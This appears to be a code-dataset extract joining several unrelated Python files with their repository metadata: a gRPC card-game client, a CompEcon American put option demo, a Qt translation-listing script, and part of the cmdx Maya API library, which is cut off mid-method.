def createLoginForm(stub):
username = input("Digite seu login: ")
password = input("Digite sua senha: ")
_redis = redis.Redis(
host= 'localhost',
port= '6379',
password = 'davi')
_redis.set('username', username)
value = _redis.get('username')
print("variavel do redis:", value)
return stub.Login(helloworld_pb2.LoginRequest(username=username, password=password))
def runTurn(stub, auth_token):
extraCard = input("Deseja cavar mais uma carta? S/N: ")
return stub.TurnAction(helloworld_pb2.TurnRequest(auth_token=auth_token, dig = extraCard))
def run():
# NOTE(gRPC Python Team): .close() is possible on a channel and should be
# used in circumstances in which the with statement does not fit the needs
# of the code.
with grpc.insecure_channel('0.0.0.0:50051') as channel:
stub = helloworld_pb2_grpc.GreeterStub(channel)
login = createLoginForm(stub)
print("Suas cartas são: ", login.message)
while True:
turnResponse = runTurn(stub, login.auth_token)
print("Suas cartas são: ", turnResponse.cards)
if turnResponse.message:
print(turnResponse.message)
if turnResponse.playing == "False":
break
winner = stub.VerifyTurn(helloworld_pb2.VerifyTurnRequest(auth_token=login.auth_token))
print(winner.message)
if __name__ == '__main__':
logging.basicConfig()
run()
| 35.057971 | 98 | 0.678379 | [
"BSD-3-Clause"
] | DMCDavi/grpc-stateful-less | examples/python/helloworld/greeter_client.py | 2,421 | Python |
__author__ = 'Randall'
from demos.setup import np, plt, demo
from compecon import DDPmodel
# DEMDDP04 Binomial American put option model
# Model Parameters
T = 0.5 # years to expiration
sigma = 0.2 # annual volatility
r = 0.05 # annual interest rate
strike = 2.1 # option strike price
p0 = 2.0 # current asset price
# Discretization Parameters
N = 100 # number of time intervals
tau = T / N # length of time intervals
delta = np.exp(-r * tau) # discount factor
u = np.exp(sigma * np.sqrt(tau)) # up jump factor
q = 0.5 + np.sqrt(tau) * (r - (sigma**2) / 2) / (2 * sigma) # up jump probability
# State Space
price = p0 * u ** np.arange(-N, N+1) # asset prices
n = price.size # number of states
# Action Space (hold=1, exercise=2)
X = ['hold', 'exercise'] # vector of actions
m = len(X) # number of actions
# Reward Function
f = np.zeros((m,n))
f[1] = strike - price
# State Transition Probability Matrix
P = np.zeros((m, n, n))
for i in range(n):
P[0, i, min(i + 1, n - 1)] = q
P[0, i, max(i - 1, 0)] = 1 - q
# Model Structure
model = DDPmodel(f, P, delta, horizon=N)
model.solve()
## Analysis
# Plot Optimal Exercise Boundary
i, j = np.where(np.diff(model.policy[:-1], 1))
temp = (i * tau)[::-1]
demo.figure('Put Option Optimal Exercise Boundary', 'Time to Maturity', 'Asset Price')
plt.plot(temp, price[j])
# Plot Option Premium vs. Asset Price
demo.figure('Put Option Value', 'Asset Price', 'Premium', [0, 2 * strike])
plt.plot([0, strike],[strike, 0], 'k--', lw=2)
plt.plot(price, model.value[0], lw=3)
plt.show() | 29.017241 | 86 | 0.59893 | [
"MIT"
] | daniel-schaefer/CompEcon-python | compecon/demos/demddp04.py | 1,683 | Python |
#!/usr/bin/env python
# Helpful little script that spits out a comma-separated list of
# language codes for Qt icons that should be included
# in binary Astercoin Core distributions
import glob
import os
import re
import sys
if len(sys.argv) != 3:
sys.exit("Usage: %s $QTDIR/translations $BITCOINDIR/src/qt/locale"%sys.argv[0])
d1 = sys.argv[1]
d2 = sys.argv[2]
l1 = set([ re.search(r'qt_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d1, 'qt_*.qm')) ])
l2 = set([ re.search(r'astercoin_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d2, 'astercoin_*.qm')) ])
print ",".join(sorted(l1.intersection(l2)))
| 27.26087 | 112 | 0.685805 | [
"MIT"
] | PsyTeck/astercoin | contrib/qt_translations.py | 627 | Python |
# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import math
import types
import logging
import traceback
import operator
import collections
from functools import wraps
from maya import cmds
from maya.api import OpenMaya as om, OpenMayaAnim as oma, OpenMayaUI as omui
from maya import OpenMaya as om1, OpenMayaMPx as ompx1, OpenMayaUI as omui1
__version__ = "0.4.6"
PY3 = sys.version_info[0] == 3
# Bypass assertion error on unsupported Maya versions
IGNORE_VERSION = bool(os.getenv("CMDX_IGNORE_VERSION"))
# Output profiling information to console
# CAREFUL! This will flood your console. Use sparingly.
TIMINGS = bool(os.getenv("CMDX_TIMINGS"))
# Do not perform any caching of nodes or plugs
SAFE_MODE = bool(os.getenv("CMDX_SAFE_MODE"))
# Increase performance by not protecting against
# fatal crashes (e.g. operations on deleted nodes)
# This can be useful when you know for certain that a
# series of operations will happen in isolation, such
# as during an auto rigging build or export process.
ROGUE_MODE = not SAFE_MODE and bool(os.getenv("CMDX_ROGUE_MODE"))
# Increase performance by not bothering to free up unused memory
MEMORY_HOG_MODE = not SAFE_MODE and bool(os.getenv("CMDX_MEMORY_HOG_MODE"))
ENABLE_PEP8 = True
# Support undo/redo
ENABLE_UNDO = not SAFE_MODE
# Required
ENABLE_PLUG_REUSE = True
if PY3:
string_types = str,
else:
string_types = str, basestring, unicode
try:
__maya_version__ = int(cmds.about(version=True))
except (AttributeError, ValueError):
__maya_version__ = 2015 # E.g. Preview Release 95
if not IGNORE_VERSION:
assert __maya_version__ >= 2015, "Requires Maya 2015 or newer"
self = sys.modules[__name__]
self.installed = False
log = logging.getLogger("cmdx")
# Aliases - API 1.0
om1 = om1
omui1 = omui1
# Aliases - API 2.0
om = om
oma = oma
omui = omui
# Accessible via `cmdx.NodeReuseCount` etc.
Stats = self
Stats.NodeInitCount = 0
Stats.NodeReuseCount = 0
Stats.PlugReuseCount = 0
Stats.LastTiming = None
# Node reuse depends on this member
if not hasattr(om, "MObjectHandle"):
log.warning("Node reuse might not work in this version of Maya "
"(OpenMaya.MObjectHandle not found)")
TimeUnit = om.MTime.uiUnit()
# DEPRECATED
MTime = om.MTime
MDistance = om.MDistance
MAngle = om.MAngle
TimeType = om.MTime
DistanceType = om.MDistance
AngleType = om.MAngle
ExistError = type("ExistError", (RuntimeError,), {})
DoNothing = None
# Reusable objects, for performance
GlobalDagNode = om.MFnDagNode()
GlobalDependencyNode = om.MFnDependencyNode()
First = 0
Last = -1
# Animation curve interpolation, from MFnAnimCurve::TangentType
Stepped = 5
Linear = 2
Smooth = 4
history = dict()
class ModifierError(RuntimeError):
def __init__(self, history):
tasklist = list()
for task in history:
cmd, args, kwargs = task
tasklist += [
"%s(%s)" % (cmd, ", ".join(map(repr, args)))
]
message = (
"An unexpected internal failure occurred, "
"these tasks were attempted:\n- " +
"\n- ".join(tasklist)
)
self.history = history
super(ModifierError, self).__init__(message)
def withTiming(text="{func}() {time:.2f} ns"):
"""Append timing information to a function
Example:
@withTiming()
def function():
pass
"""
def timings_decorator(func):
if not TIMINGS:
# Do not wrap the function.
# This yields zero cost to runtime performance
return func
@wraps(func)
def func_wrapper(*args, **kwargs):
t0 = time.clock()
try:
return func(*args, **kwargs)
finally:
t1 = time.clock()
duration = (t1 - t0) * 10 ** 6 # microseconds
Stats.LastTiming = duration
log.debug(
text.format(func=func.__name__,
time=duration)
)
return func_wrapper
return timings_decorator
def protected(func):
"""Prevent fatal crashes from illegal access to deleted nodes"""
if ROGUE_MODE:
return func
@wraps(func)
def func_wrapper(*args, **kwargs):
if args[0]._destroyed:
raise ExistError("Cannot perform operation on deleted node")
return func(*args, **kwargs)
return func_wrapper
def add_metaclass(metaclass):
"""Add metaclass to Python 2 and 3 class
Helper decorator, from six.py
"""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
if hasattr(cls, '__qualname__'):
orig_vars['__qualname__'] = cls.__qualname__
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
class _Type(int):
"""Facilitate use of isinstance(space, _Type)"""
MFn = om.MFn
kDagNode = _Type(om.MFn.kDagNode)
kShape = _Type(om.MFn.kShape)
kTransform = _Type(om.MFn.kTransform)
kJoint = _Type(om.MFn.kJoint)
kSet = _Type(om.MFn.kSet)
class _Space(int):
"""Facilitate use of isinstance(space, _Space)"""
# Spaces
sWorld = _Space(om.MSpace.kWorld)
sObject = _Space(om.MSpace.kObject)
sTransform = _Space(om.MSpace.kTransform)
sPostTransform = _Space(om.MSpace.kPostTransform)
sPreTransform = _Space(om.MSpace.kPreTransform)
kXYZ = om.MEulerRotation.kXYZ
kYZX = om.MEulerRotation.kYZX
kZXY = om.MEulerRotation.kZXY
kXZY = om.MEulerRotation.kXZY
kYXZ = om.MEulerRotation.kYXZ
kZYX = om.MEulerRotation.kZYX
class _Unit(int):
"""A Maya unit, for unit-attributes such as Angle and Distance
Because the resulting classes are subclasses of `int`, there
is virtually no run-time performance penalty to using it as
an integer. No additional Python is called, most notably when
passing the integer class to the Maya C++ binding (which wouldn't
call our overridden methods anyway).
The added overhead to import time is neglible.
"""
def __new__(cls, unit, enum):
self = super(_Unit, cls).__new__(cls, enum)
self._unit = unit
return self
def __call__(self, enum):
return self._unit(enum, self)
# Angular units
Degrees = _Unit(om.MAngle, om.MAngle.kDegrees)
Radians = _Unit(om.MAngle, om.MAngle.kRadians)
AngularMinutes = _Unit(om.MAngle, om.MAngle.kAngMinutes)
AngularSeconds = _Unit(om.MAngle, om.MAngle.kAngSeconds)
# Distance units
Millimeters = _Unit(om.MDistance, om.MDistance.kMillimeters)
Centimeters = _Unit(om.MDistance, om.MDistance.kCentimeters)
Meters = _Unit(om.MDistance, om.MDistance.kMeters)
Kilometers = _Unit(om.MDistance, om.MDistance.kKilometers)
Inches = _Unit(om.MDistance, om.MDistance.kInches)
Feet = _Unit(om.MDistance, om.MDistance.kFeet)
Miles = _Unit(om.MDistance, om.MDistance.kMiles)
Yards = _Unit(om.MDistance, om.MDistance.kYards)
# Time units
Milliseconds = _Unit(om.MTime, om.MTime.kMilliseconds)
Minutes = _Unit(om.MTime, om.MTime.kMinutes)
Seconds = _Unit(om.MTime, om.MTime.kSeconds)
def UiUnit():
"""Unlike other time units, this can be modified by the user at run-time"""
return _Unit(om.MTime, om.MTime.uiUnit())
_Cached = type("Cached", (object,), {}) # For isinstance(x, _Cached)
Cached = _Cached()
_data = collections.defaultdict(dict)
class Singleton(type):
"""Re-use previous instances of Node
Cost: 14 microseconds
This enables persistent state of each node, even when
a node is discovered at a later time, such as via
:func:`DagNode.parent()` or :func:`DagNode.descendents()`
Arguments:
mobject (MObject): Maya API object to wrap
exists (bool, optional): Whether or not to search for
an existing Python instance of this node
Example:
>>> nodeA = createNode("transform", name="myNode")
>>> nodeB = createNode("transform", parent=nodeA)
>>> encode("|myNode") is nodeA
True
>>> nodeB.parent() is nodeA
True
"""
_instances = {}
@withTiming()
def __call__(cls, mobject, exists=True, modifier=None):
handle = om.MObjectHandle(mobject)
hsh = handle.hashCode()
hx = "%x" % hsh
if exists and handle.isValid():
try:
node = cls._instances[hx]
assert not node._destroyed
except (KeyError, AssertionError):
pass
else:
Stats.NodeReuseCount += 1
node._removed = False
return node
# It didn't exist, let's create one
# But first, make sure we instantiate the right type
if mobject.hasFn(om.MFn.kDagNode):
sup = DagNode
elif mobject.hasFn(om.MFn.kSet):
sup = ObjectSet
elif mobject.hasFn(om.MFn.kAnimCurve):
sup = AnimCurve
else:
sup = Node
self = super(Singleton, sup).__call__(mobject, exists, modifier)
self._hashCode = hsh
self._hexStr = hx
cls._instances[hx] = self
return self
@add_metaclass(Singleton)
class Node(object):
"""A Maya dependency node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> decompose = createNode("decomposeMatrix", name="decompose")
>>> str(decompose)
'decompose'
>>> alias = encode(decompose.name())
>>> decompose == alias
True
>>> transform = createNode("transform")
>>> transform["tx"] = 5
>>> transform["worldMatrix"][0] >> decompose["inputMatrix"]
>>> decompose["outputTranslate"]
(5.0, 0.0, 0.0)
"""
_Fn = om.MFnDependencyNode
# Module-level cache of previously created instances of Node
_Cache = dict()
def __eq__(self, other):
"""MObject supports this operator explicitly"""
try:
# Better to ask forgivness than permission
return self._mobject == other._mobject
except AttributeError:
return str(self) == str(other)
def __ne__(self, other):
try:
return self._mobject != other._mobject
except AttributeError:
return str(self) != str(other)
def __str__(self):
return self.name(namespace=True)
def __repr__(self):
return self.name(namespace=True)
def __add__(self, other):
"""Support legacy + '.attr' behavior
Example:
>>> node = createNode("transform")
>>> getAttr(node + ".tx")
0.0
>>> delete(node)
"""
return self[other.strip(".")]
def __contains__(self, other):
"""Does the attribute `other` exist?"""
return self.hasAttr(other)
def __getitem__(self, key):
"""Get plug from self
Arguments:
key (str, tuple): String lookup of attribute,
optionally pass tuple to include unit.
Example:
>>> node = createNode("transform")
>>> node["translate"] = (1, 1, 1)
>>> node["translate", Meters]
(0.01, 0.01, 0.01)
"""
unit = None
cached = False
if isinstance(key, (list, tuple)):
key, items = key[0], key[1:]
for item in items:
if isinstance(item, _Unit):
unit = item
elif isinstance(item, _Cached):
cached = True
if cached:
try:
return CachedPlug(self._state["values"][key, unit])
except KeyError:
pass
try:
plug = self.findPlug(key)
except RuntimeError:
raise ExistError("%s.%s" % (self.path(), key))
return Plug(self, plug, unit=unit, key=key, modifier=self._modifier)
def __setitem__(self, key, value):
"""Support item assignment of new attributes or values
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="myNode")
>>> node["myAttr"] = Double(default=1.0)
>>> node["myAttr"] == 1.0
True
>>> node["rotateX", Degrees] = 1.0
>>> node["rotateX"] = Degrees(1)
>>> node["rotateX", Degrees]
1.0
>>> node["myDist"] = Distance()
>>> node["myDist"] = node["translateX"]
>>> node["myDist", Centimeters] = node["translateX", Meters]
>>> round(node["rotateX", Radians], 3)
0.017
>>> node["myDist"] = Distance()
Traceback (most recent call last):
...
ExistError: myDist
>>> node["notExist"] = 5
Traceback (most recent call last):
...
ExistError: |myNode.notExist
>>> delete(node)
"""
if isinstance(value, Plug):
value = value.read()
unit = None
if isinstance(key, (list, tuple)):
key, unit = key
# Convert value to the given unit
if isinstance(value, (list, tuple)):
value = list(unit(v) for v in value)
else:
value = unit(value)
# Create a new attribute
elif isinstance(value, (tuple, list)):
if isinstance(value[0], type):
if issubclass(value[0], _AbstractAttribute):
Attribute, kwargs = value
attr = Attribute(key, **kwargs)
try:
return self.addAttr(attr.create())
except RuntimeError:
# NOTE: I can't be sure this is the only occasion
# where this exception is thrown. Stay catious.
raise ExistError(key)
try:
plug = self.findPlug(key)
except RuntimeError:
raise ExistError("%s.%s" % (self.path(), key))
plug = Plug(self, plug, unit=unit)
if not getattr(self._modifier, "isDone", True):
# Only a few attribute types are supported by a modifier
if _python_to_mod(value, plug, self._modifier._modifier):
return
else:
log.warning(
"Could not write %s via modifier, writing directly.."
% plug
)
# Else, write it immediately
plug.write(value)
def _onDestroyed(self, mobject):
self._destroyed = True
om.MMessage.removeCallbacks(self._state["callbacks"])
for callback in self.onDestroyed:
try:
callback(self)
except Exception:
traceback.print_exc()
_data.pop(self.hex, None)
def _onRemoved(self, mobject, modifier, _=None):
self._removed = True
for callback in self.onRemoved:
try:
callback()
except Exception:
traceback.print_exc()
def __delitem__(self, key):
self.deleteAttr(key)
@withTiming()
def __init__(self, mobject, exists=True, modifier=None):
"""Initialise Node
Private members:
mobject (om.MObject): Wrap this MObject
fn (om.MFnDependencyNode): The corresponding function set
modifier (om.MDagModifier, optional): Operations are
deferred to this modifier.
destroyed (bool): Has this node been destroyed by Maya?
state (dict): Optional state for performance
"""
self._mobject = mobject
self._fn = self._Fn(mobject)
self._modifier = modifier
self._destroyed = False
self._removed = False
self._hashCode = None
self._state = {
"plugs": dict(),
"values": dict(),
"callbacks": list()
}
# Callbacks
self.onDestroyed = list()
self.onRemoved = list()
Stats.NodeInitCount += 1
self._state["callbacks"] += [
# Monitor node deletion, to prevent accidental
# use of MObject past its lifetime which may
# result in a fatal crash.
om.MNodeMessage.addNodeDestroyedCallback(
mobject,
self._onDestroyed, # func
None # clientData
) if not ROGUE_MODE else 0,
om.MNodeMessage.addNodeAboutToDeleteCallback(
mobject,
self._onRemoved,
None
),
]
def plugin(self):
"""Return the user-defined class of the plug-in behind this node"""
return type(self._fn.userNode())
def instance(self):
"""Return the current plug-in instance of this node"""
return self._fn.userNode()
def object(self):
"""Return MObject of this node"""
return self._mobject
def isAlive(self):
"""The node exists somewhere in memory"""
return not self._destroyed
@property
def data(self):
"""Special handling for data stored in the instance
Normally, the initialisation of data could happen in the __init__,
but for some reason the postConstructor of a custom plug-in calls
__init__ twice for every unique hex, which causes any data added
there to be wiped out once the postConstructor is done.
"""
return _data[self.hex]
@property
def destroyed(self):
return self._destroyed
@property
def exists(self):
"""The node exists in both memory *and* scene
Example:
>>> node = createNode("joint")
>>> node.exists
True
>>> cmds.delete(str(node))
>>> node.exists
False
>>> node.destroyed
False
>>> _ = cmds.file(new=True, force=True)
>>> node.exists
False
>>> node.destroyed
True
"""
return not self._removed
@property
def removed(self):
return self._removed
@property
def hashCode(self):
"""Return MObjectHandle.hashCode of this node
This a guaranteed-unique integer (long in Python 2)
similar to the UUID of Maya 2016
"""
return self._hashCode
@property
def hexStr(self):
"""Return unique hashCode as hexadecimal string
Example:
>>> node = createNode("transform")
>>> node.hexStr == format(node.hashCode, "x")
True
"""
return self._hexStr
# Alias
code = hashCode
hex = hexStr
@property
def typeId(self):
"""Return the native maya.api.MTypeId of this node
Example:
>>> node = createNode("transform")
>>> node.typeId == tTransform
True
"""
return self._fn.typeId
@property
def typeName(self):
return self._fn.typeName
def isA(self, type):
"""Evaluate whether self is of `type`
Arguments:
type (int): MFn function set constant
Example:
>>> node = createNode("transform")
>>> node.isA(kTransform)
True
>>> node.isA(kShape)
False
"""
return self._mobject.hasFn(type)
def lock(self, value=True):
self._fn.isLocked = value
def isLocked(self):
return self._fn.isLocked
@property
def storable(self):
"""Whether or not to save this node with the file"""
# How is this value queried?
return None
@storable.setter
def storable(self, value):
# The original function is a double negative
self._fn.setDoNotWrite(not bool(value))
# Module-level branch; evaluated on import
@withTiming("findPlug() reuse {time:.4f} ns")
def findPlug(self, name, cached=False):
"""Cache previously found plugs, for performance
Cost: 4.9 microseconds/call
Part of the time taken in querying an attribute is the
act of finding a plug given its name as a string.
This causes a 25% reduction in time taken for repeated
attribute queries. Though keep in mind that state is stored
in the `cmdx` object which currently does not survive rediscovery.
That is, if a node is created and later discovered through a call
to `encode`, then the original and discovered nodes carry one
state each.
Additional challenges include storing the same plug for both
long and short name of said attribute, which is currently not
the case.
Arguments:
name (str): Name of plug to find
cached (bool, optional): Return cached plug, or
throw an exception. Default to False, which
means it will run Maya's findPlug() and cache
the result.
safe (bool, optional): Always find the plug through
Maya's API, defaults to False. This will not perform
any caching and is intended for use during debugging
to spot whether caching is causing trouble.
Example:
>>> node = createNode("transform")
>>> node.findPlug("translateX", cached=True)
Traceback (most recent call last):
...
KeyError: "'translateX' not cached"
>>> plug1 = node.findPlug("translateX")
>>> isinstance(plug1, om.MPlug)
True
>>> plug1 is node.findPlug("translateX")
True
>>> plug1 is node.findPlug("translateX", cached=True)
True
"""
try:
existing = self._state["plugs"][name]
Stats.PlugReuseCount += 1
return existing
except KeyError:
if cached:
raise KeyError("'%s' not cached" % name)
plug = self._fn.findPlug(name, False)
self._state["plugs"][name] = plug
return plug
def update(self, attrs):
"""Apply a series of attributes all at once
This operates similar to a Python dictionary.
Arguments:
attrs (dict): Key/value pairs of name and attribute
Examples:
>>> node = createNode("transform")
>>> node.update({"tx": 5.0, ("ry", Degrees): 30.0})
>>> node["tx"]
5.0
"""
for key, value in attrs.items():
self[key] = value
def clear(self):
"""Clear transient state
A node may cache previously queried values for performance
at the expense of memory. This method erases any cached
values, freeing up memory at the expense of performance.
Example:
>>> node = createNode("transform")
>>> node["translateX"] = 5
>>> node["translateX"]
5.0
>>> # Plug was reused
>>> node["translateX"]
5.0
>>> # Value was reused
>>> node.clear()
>>> node["translateX"]
5.0
>>> # Plug and value was recomputed
"""
self._state["plugs"].clear()
self._state["values"].clear()
@protected
def name(self, namespace=False):
"""Return the name of this node
Arguments:
namespace (bool, optional): Return with namespace,
defaults to False
Example:
>>> node = createNode("transform", name="myName")
>>> node.name()
u'myName'
"""
if namespace:
return self._fn.name()
else:
return self._fn.name().rsplit(":", 1)[-1]
def namespace(self):
"""Get namespace of node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="myNode")
>>> node.namespace()
u''
>>> _ = cmds.namespace(add=":A")
>>> _ = cmds.namespace(add=":A:B")
>>> node = createNode("transform", name=":A:B:myNode")
>>> node.namespace()
u'A:B'
"""
name = self._fn.name()
if ":" in name:
# Else it will return name as-is, as namespace
# E.g. Ryan_:leftHand -> Ryan_, but :leftHand -> leftHand
return name.rsplit(":", 1)[0]
return type(name)()
# Alias
def path(self):
return self.name(namespace=True)
shortestPath = path
def pop(self, key):
"""Delete an attribute
Arguments:
key (str): Name of attribute to delete
Example:
>>> node = createNode("transform")
>>> node["myAttr"] = Double()
>>> node.pop("myAttr")
>>> node.hasAttr("myAttr")
False
"""
del self[key]
def dump(self, ignore_error=True):
"""Return dictionary of all attributes
Example:
>>> import json
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("choice")
>>> dump = node.dump()
>>> isinstance(dump, dict)
True
>>> dump["choice1.caching"]
False
"""
attrs = {}
count = self._fn.attributeCount()
for index in range(count):
obj = self._fn.attribute(index)
plug = self._fn.findPlug(obj, False)
try:
value = Plug(self, plug).read()
except (RuntimeError, TypeError):
# TODO: Support more types of attributes,
# such that this doesn't need to happen.
value = None
if not ignore_error:
raise
attrs[plug.name()] = value
return attrs
def dumps(self, indent=4, sortKeys=True):
"""Return a JSON compatible dictionary of all attributes"""
return json.dumps(self.dump(), indent=indent, sort_keys=sortKeys)
def type(self):
"""Return type name
Example:
>>> node = createNode("choice")
>>> node.type()
u'choice'
"""
return self._fn.typeName
def addAttr(self, attr):
"""Add a new dynamic attribute to node
Arguments:
attr (Plug): Add this attribute
Example:
>>> node = createNode("transform")
>>> attr = Double("myAttr", default=5.0)
>>> node.addAttr(attr)
>>> node["myAttr"] == 5.0
True
"""
if isinstance(attr, _AbstractAttribute):
attr = attr.create()
self._fn.addAttribute(attr)
def hasAttr(self, attr):
"""Return whether or not `attr` exists
Arguments:
attr (str): Name of attribute to check
Example:
>>> node = createNode("transform")
>>> node.hasAttr("mysteryAttribute")
False
>>> node.hasAttr("translateX")
True
>>> node["myAttr"] = Double() # Dynamic attribute
>>> node.hasAttr("myAttr")
True
"""
return self._fn.hasAttribute(attr)
def deleteAttr(self, attr):
"""Delete `attr` from node
Arguments:
attr (Plug): Attribute to remove
Example:
>>> node = createNode("transform")
>>> node["myAttr"] = Double()
>>> node.deleteAttr("myAttr")
>>> node.hasAttr("myAttr")
False
"""
if not isinstance(attr, Plug):
attr = self[attr]
attribute = attr._mplug.attribute()
self._fn.removeAttribute(attribute)
def connections(self, type=None, unit=None, plugs=False):
"""Yield plugs of node with a connection to any other plug
Arguments:
unit (int, optional): Return plug in this unit,
e.g. Meters or Radians
type (str, optional): Restrict output to nodes of this type,
e.g. "transform" or "mesh"
plugs (bool, optional): Return plugs, rather than nodes
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", name="A")
>>> b = createNode("multDoubleLinear", name="B")
>>> a["ihi"] << b["ihi"]
>>> list(a.connections()) == [b]
True
>>> list(b.connections()) == [a]
True
>>> a.connection() == b
True
"""
for plug in self._fn.getConnections():
mobject = plug.node()
node = Node(mobject)
if not type or type == node._fn.typeName:
plug = Plug(node, plug, unit)
for connection in plug.connections(plugs=plugs):
yield connection
def connection(self, type=None, unit=None, plug=False):
"""Singular version of :func:`connections()`"""
return next(self.connections(type, unit, plug), None)
def rename(self, name):
if not getattr(self._modifier, "isDone", True):
return self._modifier.rename(self, name)
mod = om.MDGModifier()
mod.renameNode(self._mobject, name)
mod.doIt()
if ENABLE_PEP8:
is_alive = isAlive
hex_str = hexStr
hash_code = hashCode
type_id = typeId
type_name = typeName
is_a = isA
is_locked = isLocked
find_plug = findPlug
add_attr = addAttr
has_attr = hasAttr
delete_attr = deleteAttr
shortest_path = shortestPath
class DagNode(Node):
"""A Maya DAG node
The difference between this and Node is that a DagNode
can have one or more children and one parent (multiple
parents not supported).
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.parent() == parent
True
>>> next(parent.children()) == child
True
>>> parent.child() == child
True
>>> sibling = createNode("transform", parent=parent)
>>> child.sibling() == sibling
True
>>> shape = createNode("mesh", parent=child)
>>> child.shape() == shape
True
>>> shape.parent() == child
True
"""
_Fn = om.MFnDagNode
def __str__(self):
return self.path()
def __repr__(self):
return self.path()
def __init__(self, mobject, *args, **kwargs):
super(DagNode, self).__init__(mobject, *args, **kwargs)
self._tfn = om.MFnTransform(mobject)
@protected
def path(self):
"""Return full path to node
Example:
>>> parent = createNode("transform", "myParent")
>>> child = createNode("transform", "myChild", parent=parent)
>>> child.name()
u'myChild'
>>> child.path()
u'|myParent|myChild'
"""
return self._fn.fullPathName()
@protected
def dagPath(self):
"""Return a om.MDagPath for this node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform", name="Parent")
>>> child = createNode("transform", name="Child", parent=parent)
>>> path = child.dagPath()
>>> str(path)
'Child'
>>> str(path.pop())
'Parent'
"""
return om.MDagPath.getAPathTo(self._mobject)
@protected
def shortestPath(self):
"""Return shortest unique path to node
Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform", name="myParent")
>>> child = createNode("transform", name="myChild", parent=parent)
>>> child.shortestPath()
u'myChild'
>>> child = createNode("transform", name="myChild")
>>> # Now `myChild` could refer to more than a single node
>>> child.shortestPath()
u'|myChild'
"""
return self._fn.partialPathName()
@property
def level(self):
"""Return the number of parents this DAG node has
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.level
1
>>> parent.level
0
"""
return self.path().count("|") - 1
@property
def boundingBox(self):
"""Return a cmdx.BoundingBox of this DAG node"""
return BoundingBox(self._fn.boundingBox)
def hide(self):
"""Set visibility to False"""
self["visibility"] = False
def show(self):
"""Set visibility to True"""
self["visibility"] = True
def addChild(self, child, index=Last):
"""Add `child` to self
Arguments:
child (Node): Child to add
index (int, optional): Physical location in hierarchy,
defaults to cmdx.Last
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform")
>>> parent.addChild(child)
"""
mobject = child._mobject
self._fn.addChild(mobject, index)
def assembly(self):
"""Return the top-level parent of node
Example:
>>> parent1 = createNode("transform")
>>> parent2 = createNode("transform")
>>> child = createNode("transform", parent=parent1)
>>> grandchild = createNode("transform", parent=child)
>>> child.assembly() == parent1
True
>>> parent2.assembly() == parent2
True
"""
path = self._fn.getPath()
root = None
for level in range(path.length() - 1):
root = path.pop()
return self.__class__(root.node()) if root else self
def transform(self, space=sObject, time=None):
"""Return TransformationMatrix"""
plug = self["worldMatrix"][0] if space == sWorld else self["matrix"]
return TransformationMatrix(plug.asMatrix(time))
def mapFrom(self, other, time=None):
"""Return TransformationMatrix of `other` relative self
Example:
>>> a = createNode("transform")
>>> b = createNode("transform")
>>> a["translate"] = (0, 5, 0)
>>> b["translate"] = (0, -5, 0)
>>> delta = a.mapFrom(b)
>>> delta.translation()[1]
10.0
>>> a = createNode("transform")
>>> b = createNode("transform")
>>> a["translate"] = (0, 5, 0)
>>> b["translate"] = (0, -15, 0)
>>> delta = a.mapFrom(b)
>>> delta.translation()[1]
20.0
"""
a = self["worldMatrix"][0].asMatrix(time)
b = other["worldInverseMatrix"][0].asMatrix(time)
delta = a * b
return TransformationMatrix(delta)
def mapTo(self, other, time=None):
"""Return TransformationMatrix of self relative `other`
See :func:`mapFrom` for examples.
"""
return other.mapFrom(self, time)
# Alias
root = assembly
def parent(self, type=None):
"""Return parent of node
Arguments:
type (str, optional): Return parent, only if it matches this type
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> child.parent() == parent
True
>>> not child.parent(type="camera")
True
>>> parent.parent()
"""
mobject = self._fn.parent(0)
if mobject.apiType() == om.MFn.kWorld:
return
cls = self.__class__
if not type or type == self._fn.__class__(mobject).typeName:
return cls(mobject)
def children(self,
type=None,
filter=om.MFn.kTransform,
query=None,
contains=None):
"""Return children of node
All returned children are transform nodes, as specified by the
`filter` argument. For shapes, use the :func:`shapes` method.
The `contains` argument only returns transform nodes containing
a shape of the type provided.
Arguments:
type (str, optional): Return only children that match this type
filter (int, optional): Return only children with this function set
contains (str, optional): Child must have a shape of this type
query (dict, optional): Limit output to nodes with these attributes
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", "a")
>>> b = createNode("transform", "b", parent=a)
>>> c = createNode("transform", "c", parent=a)
>>> d = createNode("mesh", "d", parent=c)
>>> list(a.children()) == [b, c]
True
>>> a.child() == b
True
>>> c.child(type="mesh")
>>> c.child(type="mesh", filter=None) == d
True
>>> c.child(type=("mesh", "transform"), filter=None) == d
True
>>> a.child() == b
True
>>> a.child(contains="mesh") == c
True
>>> a.child(contains="nurbsCurve") is None
True
>>> b["myAttr"] = Double(default=5)
>>> a.child(query=["myAttr"]) == b
True
>>> a.child(query=["noExist"]) is None
True
>>> a.child(query={"myAttr": 5}) == b
True
>>> a.child(query={"myAttr": 1}) is None
True
"""
# Shapes have no children
if self.isA(kShape):
return
cls = DagNode
Fn = self._fn.__class__
op = operator.eq
if isinstance(type, (tuple, list)):
op = operator.contains
other = "typeId" if isinstance(type, om.MTypeId) else "typeName"
for index in range(self._fn.childCount()):
try:
mobject = self._fn.child(index)
except RuntimeError:
# TODO: Unsure of exactly when this happens
log.warning(
"Child %d of %s not found, this is a bug" % (index, self)
)
raise
